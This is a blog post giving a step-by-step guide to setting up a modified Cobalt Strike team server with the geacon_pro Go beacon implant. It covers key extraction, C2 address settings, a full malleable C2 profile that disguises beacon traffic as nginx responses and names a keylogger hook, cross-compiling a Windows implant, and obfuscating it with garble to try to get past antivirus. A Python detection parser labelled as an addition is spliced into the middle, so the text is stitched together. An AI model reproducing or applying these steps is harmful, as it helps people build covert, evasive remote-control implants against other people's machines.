geacon_pro quick start

Preface

It does not get past 360.
This post mainly records the simple configuration process for using a modified Cobalt Strike together with geacon_pro. Links:

  • https://github.com/H4de5-7/geacon_pro
  • https://github.com/TryGOTry/CobaltStrike_Cat_4.5

Main text

CobaltStrike_Cat_4.5 configuration

First install the corresponding JDK version:

sudo apt install openjdk-11-jre-headless
sudo apt install openjdk-11-jdk

Then configure CatClient.properties; there is not much to say about it, every option comes with an explanatory hint. After that, just run teamserver directly; it is basically foolproof.

geacon_pro configuration

Configuring the public key

The tool used is BeaconTool.jar; note that running this tool requires JDK 1.8. After the CS server has been run once, a .cobaltstrike.beacon_keys file is generated in the same directory. It is recommended to copy this file to your local machine; here I renamed the file to 1111. Run the following command to obtain the public key:

java -jar .\BeaconTool.jar -i .\1111 -rsa

Replace it in config/config.go of the geacon_pro project. Note that there must be no extra whitespace here, otherwise an error is raised, as shown below:

Changing the C2 address

For the C2 IP and port below, first create a new HTTPS listener in CS, then fill in its values.

Adapting the C2 profile

The provided configuration file:

# default sleep time is 60s
set sleeptime "3000";
set jitter "7";

https-certificate {
set C "KZ";
set CN "foren.zik";
set O "NN Fern Sub";
set OU "NN Fern";
set ST "KZ";
set validity "365";
}

# define indicators for an HTTP GET
http-get {

set uri "/www/handle/doc";

client {
#header "Host" "aliyun.com";
# base64 encode session metadata and store it in the Cookie header.
metadata {
base64url;
prepend "SESSIONID=";
header "Cookie";
}
}

server {
# server should send output with no changes
#header "Content-Type" "application/octet-stream";
header "Server" "nginx/1.10.3 (Ubuntu)";
header "Content-Type" "application/octet-stream";
header "Connection" "keep-alive";
header "Vary" "Accept";
header "Pragma" "public";
header "Expires" "0";
header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

output {
mask;
netbios;
prepend "data=";
append "%%";
print;
}
}
}

# define indicators for an HTTP
http-post {
# Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]
set uri "/IMXo";
client {
#header "Content-Type" "application/octet-stream";

# transmit our session identifier as /submit.php?id=[identifier]

id {
mask;
netbiosu;
prepend "user=";
append "%%";
header "User";
}

# post our output with no real changes
output {
mask;
base64url;
prepend "data=";
append "%%";
print;
}
}

# The server's response to our HTTP POST
server {
header "Server" "nginx/1.10.3 (Ubuntu)";
header "Content-Type" "application/octet-stream";
header "Connection" "keep-alive";
header "Vary" "Accept";
header "Pragma" "public";
header "Expires" "0";
header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

# this will just print an empty string, meh...
output {
mask;
netbios;
prepend "data=";
append "%%";
print;
}
}
}

post-ex {
set spawnto_x86 "c:\\windows\\syswow64\\rundll32.exe";
set spawnto_x64 "c:\\windows\\system32\\rundll32.exe";

set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
set keylogger "SetWindowsHookEx";
}

Modify CatServer.properties to point at the c2.profile just created.

Set the relevant client options to false.
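As an added defender-side example (not code from the post or from either project), the following Python walks the client-side transforms of the profile above into indicators and checks sample HTTP requests against them; the profile excerpt and the requests are constructed, and the walk also works on the full profile as given.

```python
import re

# Constructed excerpt of the post's profile, keeping only the client-side transforms
# (the values are the ones from the profile above; the server block is left in to show it is skipped).
PROFILE = '''
http-get {
set uri "/www/handle/doc";
client { metadata { base64url; prepend "SESSIONID="; header "Cookie"; } }
server { header "Server" "nginx/1.10.3 (Ubuntu)"; }
}
http-post {
set uri "/IMXo";
client { id { mask; netbiosu; prepend "user="; append "%%"; header "User"; } }
}
'''

def parse_profile(text):
    """Brace-aware walk: per http-get/http-post block, record the URI and the header,
    prefix and suffix that carry beacon data (metadata for GET, id for POST)."""
    text = re.sub(r"#[^\n]*", "", text)            # drop comments
    stack, found, cur = [], [], None
    for tok in re.findall(r"[^{};]+[{;]|\}", text):
        tok = tok.strip()
        if tok.endswith("{"):                       # open a named block
            name = tok[:-1].strip()
            stack.append(name)
            if name in ("http-get", "http-post"):
                cur = {"verb": name.split("-")[1].upper(), "uri": "",
                       "header": "", "prepend": "", "append": ""}
                found.append(cur)
        elif tok == "}":
            stack.pop()
        elif cur is not None:
            m = re.match(r'(set uri|header|prepend|append)\s+"([^"]*)"', tok)
            if m and m.group(1) == "set uri" and len(stack) == 1:
                cur["uri"] = m.group(2)
            elif m and "client" in stack and stack[-1] in ("metadata", "id"):
                cur[m.group(1)] = m.group(2)    # only metadata/id blocks, not server/output
    return found

def match_request(indicators, method, path, headers):
    """Return the indicator a request matches (verb, URI and the shape of the
    data-carrying header), or None. A hit is a lead for the analyst, not proof."""
    for ind in indicators:
        val = headers.get(ind["header"])
        if (method == ind["verb"] and path == ind["uri"] and val is not None
                and val.startswith(ind["prepend"]) and val.endswith(ind["append"])):
            return ind
    return None
```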

Compiling and running

Compile and run under Linux:

CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build main.go

Advanced configuration

Use https://github.com/burrowers/garble for obfuscation; the obfuscation is done under Windows, using cmd.

go install mvdan.cc/garble@latest
set GO111MODULE=on
go get mvdan.cc/garble
garble.exe build

Change the AES IV; after changing it in config.go, remember to change it in CatServer.properties as well.

Change the version and port in CatServer.properties; prefer a high port.


geacon_pro quick start
https://blog.njcit.me/2023/02/06/内网/geacon-pro快速上手/
Author: ccadmin
Published on: February 6, 2023
License